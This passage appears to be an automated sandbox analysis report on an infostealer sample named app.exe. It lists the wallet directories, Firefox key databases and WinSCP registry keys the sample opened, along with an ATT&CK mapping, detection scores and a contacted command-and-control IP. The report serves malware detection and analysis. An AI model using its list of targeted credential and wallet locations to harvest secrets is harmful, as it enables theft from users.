Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.AssignedAccessLockApp_cw5n1h2txyewy VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.CloudExperienceHost_cw5n1h2txyewy VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.NarratorQuickStart_8wekyb3d8bbwe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.OOBENetworkCaptivePortal_cw5n1h2txyewy VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Photos_8wekyb3d8bbwe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.XGpuEjectDialog_cw5n1h2txyewy VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.WindowsAlarms_8wekyb3d8bbwe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.WindowsAppRuntime.1.2_8wekyb3d8bbwe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.WindowsCamera_8wekyb3d8bbwe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.WindowsStore_8wekyb3d8bbwe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Xbox.TCUI_8wekyb3d8bbwe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.XboxApp_8wekyb3d8bbwe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.XboxGameOverlay_8wekyb3d8bbwe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Local\Packages\SpotifyAB.SpotifyMusic_zpdnekdrzrea0 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Windows.CBSPreview_cw5n1h2txyewy VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Local\Packages\windows_ie_ac_001 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Local\PeerDistRepub VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Local\PlaceholderTileLogoFolder VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Local\Publishers VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Local\Temp VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Local\Temp\0353475199 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Local\Temp\0487075091 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Local\Temp\0615447233 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Local\Temp\0615447233 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Local\Temp\0666563528 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Local\Temp\0666563528 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Local\Temp\0825612946 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Local\Temp\0887538035 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Local\Temp\0939541263 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Local\Temp\0939541263 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1169381505 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1244065654 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1287572840 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1287572840 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1343496627 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1343496627 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1387277564 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1387277564 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1417002460 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Local\Temp\2165547404 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Local\Temp\2165547404 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Local\Temp\2265332024 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Local\Temp\2265465471 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Local\Temp\2874006916 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Local\Temp\3677062445 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Local\Temp\acrord32_sbx VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Local\Temp\B018D45B-96A4-4B60-BED4-BC78D47B50F2 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Local\Temp\hsperfdata_user VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Importer_6_Default_4 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Low VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Local\Temp\MpCmdRun.log VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Local\Temp\MpCmdRun.log VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Symbols VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Local\Temp\TCDE6D1.tmp VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Local\Temp\TCDE6EA.tmp VolumeInformation
Source: C:\Users\user\Desktop\app.exeCode function: 0_2_0041C882 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,
Source: C:\Users\user\Desktop\app.exeCode function: 0_2_0041DD1B GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,
Source: C:\Users\user\Desktop\app.exeCode function: 0_2_00415DDE EntryPoint,GetVersionExA,GetModuleHandleA,GetModuleHandleA,GetCommandLineA,GetStartupInfoA,GetModuleHandleA,
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT displayName FROM AntiVirusProduct

Stealing of Sensitive Information

barindex
Found many strings related to Crypto-Wallets (likely being stolen)
Source: app.exe, 00000003.00000002.3296988780.0000000005518000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %APPDATA%\Electrum\wallets\tjYCo5b
Source: app.exe, 00000003.00000002.3296988780.0000000005518000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %APPDATA%\Electrum\wallets\tjYCo5b
Source: app.exe, 00000003.00000003.3098259663.0000000000956000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: :"AtomicWallet","path":"%APPDATA%\\atomic\\Local Storage\\leveldb\\"},{"name":"Exodus","path":"%APPDATA%\\exodus\\exodus.wallet\\"},{"name":"JaxxWallet","path":"%APPDATA%\\Wallets\\Jaxx\\com.liberty.jaxx\\IndexedDB\\file__0.indexeddb.leveldb\\"},{"
Source: app.exe, 00000003.00000003.3098259663.0000000000956000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: :"AtomicWallet","path":"%APPDATA%\\atomic\\Local Storage\\leveldb\\"},{"name":"Exodus","path":"%APPDATA%\\exodus\\exodus.wallet\\"},{"name":"JaxxWallet","path":"%APPDATA%\\Wallets\\Jaxx\\com.liberty.jaxx\\IndexedDB\\file__0.indexeddb.leveldb\\"},{"
Source: app.exe, 00000003.00000002.3296988780.0000000005518000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %APPDATA%\Ethereum\keystore\XdPr
Source: app.exe, 00000003.00000003.3292397056.000000000556B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Exodus
Source: app.exe, 00000003.00000002.3296988780.0000000005518000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %APPDATA%\Ethereum\keystore\XdPr
Source: app.exe, 00000003.00000002.3296988780.0000000005518000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %APPDATA%\Coinomi\Coinomi\wallets\
Source: app.exe, 00000003.00000002.3296988780.0000000005518000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %APPDATA%\exodus\exodus.wallet\Y
Source: app.exe, 00000003.00000002.3296988780.0000000005518000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %APPDATA%\Ethereum\keystore\XdPr
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeFile opened: C:\Users\user\Local Settings\Mozilla\Firefox\Profiles\ol7uiqa8.default-release\key4.db
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeFile opened: C:\Users\user\Application Data\Mozilla\Firefox
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeFile opened: C:\Users\user\Local Settings\Mozilla\Firefox\Profiles\kzpbmws1.default\key4.db
Tries to steal Crypto Currency Wallets
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeFile opened: C:\Users\user\AppData\Roaming\exodus\exodus.wallet\
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeFile opened: C:\Users\user\AppData\Roaming\exodus\exodus.wallet\
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeFile opened: C:\Users\user\AppData\Roaming\Coinomi\Coinomi\wallets\
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\

Mitre Att&ck Matrix

ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid Accounts331
Windows Management Instrumentation		1
DLL Side-Loading		1
DLL Side-Loading		1
Disable or Modify Tools		1
OS Credential Dumping		2
System Time Discovery		Remote Services1
Archive Collected Data		1
Ingress Tool Transfer		Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault Accounts1
Native API		1
Bootkit		11
Process Injection		1
Deobfuscate/Decode Files or Information		1
Input Capture		2
File and Directory Discovery		Remote Desktop Protocol3
Data from Local System		21
Encrypted Channel		Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)2
Obfuscated Files or Information		1
Credentials in Registry		45
System Information Discovery		SMB/Windows Admin Shares1
Input Capture		3
Non-Application Layer Protocol		Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
Software Packing		NTDS461
Security Software Discovery		Distributed Component Object ModelInput Capture14
Application Layer Protocol		Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
DLL Side-Loading		LSA Secrets13
Virtualization/Sandbox Evasion		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
File Deletion		Cached Domain Credentials1
Process Discovery		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items13
Virtualization/Sandbox Evasion		DCSync1
Application Window Discovery		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job11
Process Injection		Proc Filesystem2
System Network Configuration Discovery		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
Bootkit		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1436386 Sample: app.exe Startdate: 05/05/2024 Architecture: WINDOWS Score: 100 29 api.ipify.org 2->29 35 Snort IDS alert for network traffic 2->35 37 Multi AV Scanner detection for submitted file 2->37 39 Machine Learning detection for sample 2->39 41 2 other signatures 2->41 9 app.exe 5 2->9         started        signatures3 process4 file5 27 C:\Users\user\AppData\Local\Temp\...\app.exe, PE32 9->27 dropped 43 Detected unpacking (creates a PE file in dynamic memory) 9->43 45 Queries sensitive physical memory information (via WMI, Win32_PhysicalMemory, often done to detect virtual machines) 9->45 47 Contains functionality to infect the boot sector 9->47 49 Queries memory information (via WMI often done to detect virtual machines) 9->49 13 app.exe 10 9 9->13         started        17 conhost.exe 9->17         started        signatures6 process7 dnsIp8 31 144.208.127.230, 49789, 80 SHOCK-1US United States 13->31 33 api.ipify.org 172.67.74.152, 443, 49788 CLOUDFLARENETUS United States 13->33 51 Multi AV Scanner detection for dropped file 13->51 53 Detected unpacking (creates a PE file in dynamic memory) 13->53 55 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 13->55 57 7 other signatures 13->57 19 cmd.exe 1 13->19         started        21 conhost.exe 13->21         started        signatures9 process10 process11 23 conhost.exe 19->23         started        25 timeout.exe 1 19->25         started       

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
app.exe11%ReversingLabs
app.exe100%Joe Sandbox ML
app.exe11%VirustotalBrowse

Dropped Files

SourceDetectionScannerLabelLink
C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe100%Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe11%ReversingLabs
C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe11%VirustotalBrowse

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

SourceDetectionScannerLabelLink
http://144.208.127.230/J0%Avira URL Cloudsafe
http://144.208.127.230/v0%Avira URL Cloudsafe
http://144.208.127.230:80/w0%Avira URL Cloudsafe
http://144.208.127.230/0%Avira URL Cloudsafe
http://144.208.127.230/z0%Avira URL Cloudsafe
http://144.208.127.230/z0%VirustotalBrowse
http://144.208.127.2300%Avira URL Cloudsafe
http://144.208.127.230/B0%Avira URL Cloudsafe
http://144.208.127.230/J0%VirustotalBrowse
http://144.208.127.230/0%VirustotalBrowse
http://144.208.127.230:80/w0%VirustotalBrowse
http://144.208.127.230/Y0%Avira URL Cloudsafe
http://144.208.127.230/U0%Avira URL Cloudsafe
https://ocsp.quovadisoffshore.com00%Avira URL Cloudsafe
http://144.208.127.230:80/0%Avira URL Cloudsafe
http://144.208.127.230:80/-35b871f0a6610%Avira URL Cloudsafe
http://144.208.127.230:80/L0%Avira URL Cloudsafe
http://144.208.127.2300%VirustotalBrowse
http://144.208.127.230/70%Avira URL Cloudsafe
http://144.208.127.230:80/0%VirustotalBrowse
http://144.208.127.230/Y0%VirustotalBrowse
https://POSTHTTP/1.1Content-Type:0%Avira URL Cloudsafe
http://144.208.127.230/e&0%Avira URL Cloudsafe
https://alldrivers4devices.net0%Avira URL Cloudsafe
http://144.208.127.230:80/o0%Avira URL Cloudsafe
http://144.208.127.230/70%VirustotalBrowse
http://144.208.127.230/~0%Avira URL Cloudsafe
http://144.208.127.230:80/T0%Avira URL Cloudsafe
http://www.quovadis.bm00%Avira URL Cloudsafe
http://144.208.127.230:80/-35b871f0a661ozi0%Avira URL Cloudsafe
http://144.208.127.230:80/R0%Avira URL Cloudsafe
http://144.208.127.230:80/T0%VirustotalBrowse
http://144.208.127.230U0%Avira URL Cloudsafe
http://144.208.127.230/~0%VirustotalBrowse
https://alldrivers4devices.net1%VirustotalBrowse

Domains and IPs

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
api.ipify.org
172.67.74.152
truefalse
    		high

    Contacted URLs

    NameMaliciousAntivirus DetectionReputation
    http://144.208.127.230/true
    • 0%, Virustotal, Browse
    • Avira URL Cloud: safe
    		unknown
    https://api.ipify.org/false
      		high

      URLs from Memory and Binaries

      NameSourceMaliciousAntivirus DetectionReputation
      https://duckduckgo.com/chrome_newtabapp.exe, 00000003.00000003.3188734917.00000000058E3000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3182590144.00000000058E8000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3183161453.00000000058E8000.00000004.00000020.00020000.00000000.sdmp, Web Data.3.drfalse
        		high
        https://uk.search.yahoo.com/favicon.icohttps://uk.search.yahoo.com/searchapp.exe, 00000003.00000003.3188734917.00000000058E3000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3182590144.00000000058E8000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3183161453.00000000058E8000.00000004.00000020.00020000.00000000.sdmp, Web Data.3.drfalse
          		high
          https://setup.office.com/EnterPin?ctid=7cf86fed-a1e2-4492-bd27-ed1c1d636ca8app.exe, 00000003.00000003.3182859527.00000000055F6000.00000004.00000020.00020000.00000000.sdmpfalse
            		high
            https://duckduckgo.com/ac/?q=Web Data.3.drfalse
              		high
              https://www.autoitscript.com/site/autoit/downloads/https://www.autoitscript.com/site/autoit/downloadapp.exe, 00000003.00000003.3182859527.00000000055E1000.00000004.00000020.00020000.00000000.sdmpfalse
                		high
                https://windows-drivers-x04.blogspot.comapp.exe, 00000003.00000003.3245462405.00000000058E5000.00000004.00000020.00020000.00000000.sdmpfalse
                  		high
                  https://www.autoitscript.comapp.exe, 00000003.00000003.3245462405.00000000058E5000.00000004.00000020.00020000.00000000.sdmpfalse
                    		high
                    https://www.google.com/chrome/?&brand=CHWL&utm_campaign=en&utm_source=en-et-na-us-chrome-bubble&utm_app.exe, 00000003.00000003.3182859527.00000000055F6000.00000004.00000020.00020000.00000000.sdmpfalse
                      		high
                      https://dl.packetstormsecurity.net/Crackers/bios/BIOS320.EXEapp.exe, 00000003.00000003.3182859527.00000000055E1000.00000004.00000020.00020000.00000000.sdmpfalse
                        		high
                        https://setup.office.com/home/ProvisionLoading?ctid=7cf86fed-a1e2-4492-bd27-ed1c1d636ca8-_app.exe, 00000003.00000003.3182859527.00000000055F6000.00000004.00000020.00020000.00000000.sdmpfalse
                          		high
                          https://support.google.com/chrome/?p=plugin_flashapp.exe, 00000003.00000003.3177221257.00000000055AC000.00000004.00000020.00020000.00000000.sdmpfalse
                            		high
                            https://consent.trustarc.comapp.exe, 00000003.00000003.3245462405.00000000058E5000.00000004.00000020.00020000.00000000.sdmpfalse
                              		high
                              http://144.208.127.230/zapp.exe, 00000003.00000003.3246373817.0000000000956000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3177623712.0000000000956000.00000004.00000020.00020000.00000000.sdmpfalse
                              • 0%, Virustotal, Browse
                              • Avira URL Cloud: safe
                              		unknown
                              http://144.208.127.230:80/wapp.exe, 00000003.00000003.3139260264.0000000005588000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3123698644.0000000005586000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3134624186.0000000005584000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3130432829.0000000005584000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3132299964.0000000005586000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3125985144.0000000005586000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3128278501.0000000005586000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3139068962.0000000005584000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3116136458.0000000005586000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3136784723.0000000005586000.00000004.00000020.00020000.00000000.sdmpfalse
                              • 0%, Virustotal, Browse
                              • Avira URL Cloud: safe
                              		unknown
                              http://144.208.127.230/vapp.exe, 00000003.00000002.3296988780.0000000005518000.00000004.00000020.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              https://setup.office.com/SignIn?ctid=7cf86fed-a1e2-4492-bd27-ed1c1d636ca8&redirectUri=https%3A%2F%2Fapp.exe, 00000003.00000003.3182859527.00000000055F6000.00000004.00000020.00020000.00000000.sdmpfalse
                                		high
                                https://secure.eicar.org/eicar.com;9app.exe, 00000003.00000003.3182859527.00000000055F6000.00000004.00000020.00020000.00000000.sdmpfalse
                                  		high
                                  https://www.google.comapp.exe, 00000003.00000003.3245462405.00000000058E5000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3257419916.00000000055D6000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3261882543.00000000055DC000.00000004.00000020.00020000.00000000.sdmpfalse
                                    		high
                                    https://sdlc-esd.oracle.com/ESD6/JSCDL/jdk/8u301-b09/d3c52aa6bfa54d3ca74e617f18309292/JavaSetup8u301app.exe, 00000003.00000003.3182859527.00000000055E1000.00000004.00000020.00020000.00000000.sdmpfalse
                                      		high
                                      http://144.208.127.230/Japp.exe, 00000003.00000003.3112020011.0000000000956000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3123955917.000000000095B000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3121520475.000000000095B000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3116384116.000000000095B000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3126108218.000000000095B000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3118889457.000000000095B000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3114263668.0000000000956000.00000004.00000020.00020000.00000000.sdmpfalse
                                      • 0%, Virustotal, Browse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      https://www.eicar.org/download-anti-malware-testfile/:app.exe, 00000003.00000003.3182859527.00000000055F6000.00000004.00000020.00020000.00000000.sdmpfalse
                                        		high
                                        https://packetstormsecurity.com/https://packetstormsecurity.com/files/download/22459/BIOS320.EXEhttpapp.exe, 00000003.00000003.3182859527.00000000055E1000.00000004.00000020.00020000.00000000.sdmpfalse
                                          		high
                                          https://setup.office.com/Home/EligibileActModern?ctid=7cf86fed-a1e2-4492-bd27-ed1c1d636ca8Microsoftapp.exe, 00000003.00000003.3182859527.00000000055F6000.00000004.00000020.00020000.00000000.sdmpfalse
                                            		high
                                            https://uk.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=app.exe, 00000003.00000003.3188734917.00000000058E3000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3182590144.00000000058E8000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3183161453.00000000058E8000.00000004.00000020.00020000.00000000.sdmp, Web Data.3.drfalse
                                              		high
                                              https://office.com/setupapp.exe, 00000003.00000003.3182859527.00000000055F1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                		high
                                                http://144.208.127.230/Bapp.exe, 00000003.00000003.3112020011.0000000000956000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3123955917.000000000095B000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3107954475.0000000000956000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3121520475.000000000095B000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3116384116.000000000095B000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3103448637.0000000000956000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3126108218.000000000095B000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3118889457.000000000095B000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3114263668.0000000000956000.00000004.00000020.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                https://setup.office.com/Home/EligibileActModern?ctid=7cf86fed-a1e2-4492-bd27-ed1c1d636ca8app.exe, 00000003.00000003.3182859527.00000000055F6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  		high
                                                  https://cdn.stubdownloader.services.mozilla.com/builds/firefox-latest-ssl/en-GB/win64/b5110ff5d41570app.exe, 00000003.00000003.3182859527.00000000055E1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    		high
                                                    https://lh5.googleusercontent.com/p/AF1QipOvNh-L3TTVll_wDyQd66TEaShUCp3i0iabc8se=w92-h92-n-k-noapp.exe, 00000003.00000003.3242282826.00000000055C6000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3242197510.00000000058C6000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3246273895.00000000058E5000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3245462405.00000000058E5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      		high
                                                      http://144.208.127.230app.exe, 00000003.00000002.3294569055.00000000008CF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      • 0%, Virustotal, Browse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      https://www.google.com/search?q=atapp.exe, 00000003.00000003.3182859527.00000000055F6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        		high
